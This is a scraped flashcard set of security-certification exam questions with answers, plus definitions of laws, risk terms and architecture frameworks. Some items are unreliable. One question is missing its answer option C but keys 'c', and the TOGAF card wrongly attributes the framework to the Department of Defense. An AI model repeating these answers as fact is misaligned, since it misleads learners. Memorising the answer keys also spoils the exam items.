Which of the following does software-defined networking (SDN) technology specify? A. The mapping between MAC addresses and IP addresses in software B. The end nodes' static routing tables in a dynamic way C. How routers communicate their routing tables to each other as events occur D. How routers move packets based on a centrally managed controller's instructions

D. Software-defined networking (SDN) is intended to decouple the router's logical function of making routing decisions and its mechanical function of passing data between interfaces, and to make routing decisions more centrally manageable. The SDN architecture is intended to be a standards-based way of providing control logic to routers' data planes in a scalable, programmable way.

A system has been patched many times and has recently become infected with a dangerous virus. If antimalware software indicates that disinfecting a file may damage it, what is the correct action? A. Disinfect the file and contact the vendor B. Back up the data and disinfect the file C. Replace the file with the file saved the day before D. Restore an uninfected version of the patched file from backup media

D. Some files cannot be properly sanitized by the antivirus software without destroying them or affecting their functionality. So, the administrator must replace such a file with a known uninfected file. Plus, the administrator needs to make sure he has the patched version of the file, or else he could be introducing other problems. Answer C is not the best answer because the administrator may not know the file was clean yesterday, so just restoring yesterday's file may put him right back in the same boat.

The Capability Maturity Model Integration (CMMI) approach is being used more frequently in security program and enterprise development. Which of the following provides an incorrect characteristic of this model? A. It provides a pathway for how incremental improvement can take place. B. It provides structured steps that can be followed so an organization can evolve from one level to the next and constantly improve its processes. C. It was created for process improvement and developed by Carnegie Mellon. D. It was built upon the SABSA model.

D. This model was not built upon the SABSA model. All other characteristics are true.

Which of the following is something that should be required of an offsite backup facility that stores backed-up media for companies? A. The facility should be within 10 to 15 minutes of the original facility to ensure easy access. B. The facility should contain all necessary PCs and servers and should have raised flooring. C. The facility should be protected by an armed guard. D. The facility should protect against unauthorized access and entry.

D. This question addresses a facility that is used to store backed-up data; it is not talking about an offsite facility used for disaster recovery purposes. The facility should not be only 10 to 15 minutes away, because some types of disasters could destroy both the company's main facility and this facility if they are that close together, in which case the company would lose all of its information. The facility should have the same security standards as the company's security, including protection against unauthorized access.

Which of the following transport layer protocols provides flow control? A. User datagram protocol B. Symmetric transmission control protocol C. Real-time transport protocol D. Transmission Control Protocol

D. Transmission Control Protocol

Fred has been told he needs to test a component of the new content management application under development to validate its data structure, logic, and boundary conditions. What type of testing should he carry out? A. Acceptance testing B. Regression testing C. Integration testing D. Unit testing

D. Unit testing involves testing an individual component in a controlled environment to validate data structure, logic, and boundary conditions. After a programmer develops a component, it is tested with several different input values and in many different situations. Unit testing can start early in development and usually continues throughout the development phase. One of the benefits of unit testing is finding problems early in the development cycle, when it is easier and less expensive to make changes to individual units.

Which is not a task for senior management in disaster recovery? A. Approve of final plans. B. Oversee budget. C. Drive all phases of plan D. implement the plans themselves

D. implement the plans themselves

FISMA

Governs the law for federal agencies and government contractors.

Risk Assessment Evaluation and Process

Identifying and documenting single points of failure making a prioritized list of threats to the particular business process of the organization. putting together information for developing a management strategy for risk control and for developing action plans for addressing risks. documenting acceptance of identified risks, or documenting acknowledgment of risks that will not be addressed.

Availability

Redundant Array of Independent Disks (RAID) Clustering Load Balancing Redundant data and power lines Software and data backups Disk shadowing Co-location and offsite facilities Rollback functions Failover configurations

Civil Law

Resolve Disputes --Monetary damages.

Export Controls

Restrict flow of goods and data. For military and Scientific purposes.

ECPA (Electronic Communications Privacy Act)

Restricts the interception or monitoring of oral and wire communications unless the interception or monitoring is undertaken for a business purpose or by consent Employers may monitor employees' emails and communications with some exemptions.

computer ethcis

Thou shalt not use a computer to harm other people. Thou shalt not interfere with other people's computer work. Thou shalt not snoop around in other people's computer files. Thou shalt not use a computer to steal. Thou shalt not use a computer to bear false witness. Thou shalt not copy or use proprietary software for which you have not paid. Thou shalt not use other people's computer resources without authorization or proper compensation. Thou shalt not appropriate other people's intellectual output. Thou shalt think about the social consequences of the program you are writing or the system you are designing. Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.

Zachman Architecture Framework

What, how, where, who, when and why? Each row should explain the company from that row's perspective. IT, HR, Marketing etc.

When selecting and implementing information asset protection standards, the process of scoping refers to which of the following? A. choosing the standard that most closely provides for regulatory compliance within your organization's industry. B. Altering provisions of the chosen standard so that they are more relevant to your organization's environment. D. making decisions with respect to internal penalties for noncompliance with the chosen standard.

c

Supply Chain Risk Management

the practice of managing the risk of any factor or event that can materially disrupt a supply chain, whether within a single firm or across multiple firms

Residual Risk

the risk that remains after management implements internal controls or some other response to risk

GLBA (Graham, Leach, Bliley)

1999: Regulates Financial institutions. Requires a written information security program. requires a designated security officer. Limits sharing of financial records.

Six Sigma

A business process for improving quality, reducing costs, and increasing customer satisfaction

Acceptable use policy

Also known as responsible use policy. describes how individuals may use information systems. Prohibits illegal activity. Describes what personal use is permitted.

control frameworks, why adopt

Cobit: Business-focused control Framework. ISO 27001: part of a series of business standards. Nist 800-53: Mandatory for federal agencies.

redundant components

Components used so that a functioning computer can take over automatically the tasks of a similar component that fails

Hash Functions

Create Message digests from large files

compliance obligations

Criminal Law Civil law administrative law Private regulations

Information Security Policy

Designation of individuals responsible for security. Description of security roles and responsibilities. Authority for the creation of security standards. Authority for incident response. Process for policy exceptions and violations.

Criminal Law

Deter and punish acts detrimental to society. Punishable by the deprivation of liberty.

Separation of Duties

Dividing responsibilities between two or more people to limit fraud and promote accuracy of accounting records.

Integrating Security Governance

Ensure Governing bodies understand risk and controls inform governing bodies of security incidents. Provide audit reports to governing bodies

18 USC 1029

Fraud and related activity in connection with access devices

18 USC 1030

Fraud and related activity in connection with computers

risk assessment

Identify assets determine the likelihood that a threat exploits a vulnerability determine the business impact of these potential threats. provide an economic balance between the impact of the threat and the cost of the countermeasure.

Military-oriented architecture framework

Makes sure that all of the military's operations can talk to each other. Spy satellite image must be able to be read by software.

Security Policy Framework

Policies standards guidelines procedures

GDPR

Processing must be lawful, transparent, and fair. data must be collected for specific, legitimate purposes. collect the minimum amount of data. ensure the accuracy of information. delete information when no longer needed. protect the security of personal information.

CFAA (Computer Fraud and Abuse Act)

Prohibits unauthorized access to computer systems. prohibits the creation of malicious code. Hacking is a criminal offense.

Patents

Protect inventions. Novelty. Usefulness. Non-obviousness. Patents generally last for 20 years. patents require public disclosure of the invention. Trade secrets offer an alternative to patent protection.

high availability

Protect services against the failure of a single server.

Security Standards

Provide specific details of security controls. derive their authority from policies. requires compliance with all employees.

Attack Tree

Provides a visual image of the attacks that may occur against an asset.

NIST 800-53

Publication that recommends security controls for federal info systems and organizations except those designed for national security.

Access Controls

Restrict users from accessing sensitive information without permission.

Non-repudiation

The security principle of providing proof that a transaction occurred between identified parties. Repudiation occurs when one party in a transaction denies that the transaction took place.

ARO (Annualized Rate of Occurrence)

This is calculated by dividing number of failures into the number of years between failures. Example: 1 failure every 5 years (1/5 = .20) or 20%

Sherwood Applied Business Security Architecture (SABSA) Framework

contextual, conceptual, logical, physical, component, and operational levels. done in phases. Ask what, why, how, who, where, when at each layer.

Due Care Theory

focuses on relative vulnerability of the customer, who has less information and expertise than the firm, and the ethical responsibility that places on the firm.

The Open Group architecture Framework (Togaf)

from department of defense. for: Business Architecture. Data Architecture. Application architecture. technology architecture. Uses ADM (architecture development method). analogy: people don't build cities without planning.

NIST 800-39 risk tiers

organizational tier business process tier information systems tier

PCI DSS

payment card industry data security standard - credit card, prevent identity theft

PIPEDA

personal info protection and electronic documents act


Kaugnay na mga set ng pag-aaral

Environmental Science Chapter 8 Understanding Populations

View Set

§9. Строение Земли

View Set

Modern And Contemporary Art Final

View Set

The Client with an Ectopic Pregnancy

View Set

Health Care Systems in UK and Canada

View Set

Grade 7 Unit 1- The Practice of Science (B)

View Set